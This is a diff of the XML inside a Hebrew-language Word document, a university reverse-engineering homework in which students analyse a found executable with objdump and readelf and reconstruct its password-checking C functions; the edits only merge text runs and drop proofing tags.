+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>טאוב</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> בשביל להגיע להרצאה </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>באת"מ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> מצאתם על הרצפה דיסק-און-קי חשוד</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>. על הדיסק-און-קי</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -555,7 +535,6 @@
         </w:rPr>
         <w:t xml:space="preserve">. בתוך הדיסק-און-אי נמצא קובץ ההרצה </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -563,32 +542,13 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>המוצרף</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (המוצרף לכם לתרגיל). מטרתכם בתרגיל בית זה היא לפענח מה אותה תוכנה מסתורית עושה.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -598,31 +558,13 @@
         </w:rPr>
         <w:t xml:space="preserve"> מומלץ להיעזר בכלים עליהם למדנו בקורס (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>objdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>objdump, readelf</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -666,7 +608,6 @@
         </w:rPr>
         <w:t xml:space="preserve">שימו לב: שני חלקי התרגיל מבוססים על אותו קובץ </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -674,7 +615,6 @@
         </w:rPr>
         <w:t>verySecretProgram</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -754,17 +694,8 @@
           <w:rStyle w:val="Strong"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Engenering</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Reverse Engenering</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -874,34 +805,14 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -h </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>verySecretProgram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>readelf -h verySecretProgram</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -1023,34 +934,14 @@
         </w:rPr>
         <w:t xml:space="preserve">לאחר הרצת </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>readelf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -h </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>verySecretProgram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>readelf -h verySecretProgram</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi" w:hint="cs"/>
@@ -2228,7 +2119,6 @@
         </w:rPr>
         <w:t>ב-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2236,7 +2126,6 @@
         </w:rPr>
         <w:t>Decompiler</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2259,18 +2148,8 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>להשתחזר</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> אך לרוע מזלכם חלקים מן התוכנית לא הצליחו להשתחזר</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -2426,41 +2305,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPasswordAux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t xml:space="preserve"> checkPasswordAux(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2520,7 +2365,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2541,7 +2385,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2570,7 +2413,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2601,7 +2443,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2668,20 +2509,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> c = *</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>s;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> c = *s;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2760,7 +2589,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2781,7 +2609,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2830,7 +2657,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -2851,7 +2677,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2936,20 +2761,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(c</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(c){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2996,18 +2809,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve"> &amp; 1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3019,7 +2821,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3098,7 +2899,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3119,7 +2919,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3174,20 +2973,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>          s+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>+;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>          s++;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3282,20 +3069,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>sum;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> sum;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3380,41 +3155,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>char* s){</w:t>
+        <w:t xml:space="preserve"> checkPassword(char* s){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3452,20 +3193,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">char* copy = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>s;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>char* copy = s;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3512,29 +3241,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPasswordAux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(s) &gt;</w:t>
+        <w:t>(checkPasswordAux(s) &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3546,7 +3253,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3567,7 +3273,6 @@
         </w:rPr>
         <w:t>){</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3626,7 +3331,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3647,7 +3351,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3702,20 +3405,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">     s = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>copy;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>     s = copy;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3764,7 +3455,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> y = </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3785,7 +3475,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3814,7 +3503,6 @@
         </w:rPr>
         <w:t>     </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3835,7 +3523,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3952,18 +3639,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>'a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>'</w:t>
+        <w:t>'a'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3975,7 +3651,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4004,7 +3679,6 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4023,18 +3697,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>x</w:t>
+        <w:t>(x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4144,7 +3807,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4165,7 +3827,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4242,7 +3903,6 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4261,18 +3921,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>y &gt;</w:t>
+        <w:t>(y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4362,7 +4011,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4383,7 +4031,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4470,7 +4117,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> 26y + </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4491,7 +4137,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4518,20 +4163,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>+;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>         s++;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4626,18 +4259,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">y == </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
